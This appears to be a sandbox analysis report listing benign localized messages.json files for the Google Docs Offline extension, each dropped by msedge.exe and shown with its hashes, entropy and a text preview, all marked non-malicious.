                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1672
                                                                                                                                                                                                                                                                  Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                  MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                  SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                  SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                  SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):935
                                                                                                                                                                                                                                                                  Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                  MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                  SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                  SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                  SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1065
                                                                                                                                                                                                                                                                  Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                  MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                  SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                  SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                  SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2771
                                                                                                                                                                                                                                                                  Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                  MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                  SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                  SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                  SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):858
                                                                                                                                                                                                                                                                  Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                  MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                  SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                  SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                  SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):954
                                                                                                                                                                                                                                                                  Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                  MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                  SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                  SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                  SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7312_2079598663\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):899
                                                                                                                                                                                                                                                                  Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                  MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                  SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                  SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                  SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                  Malicious:false
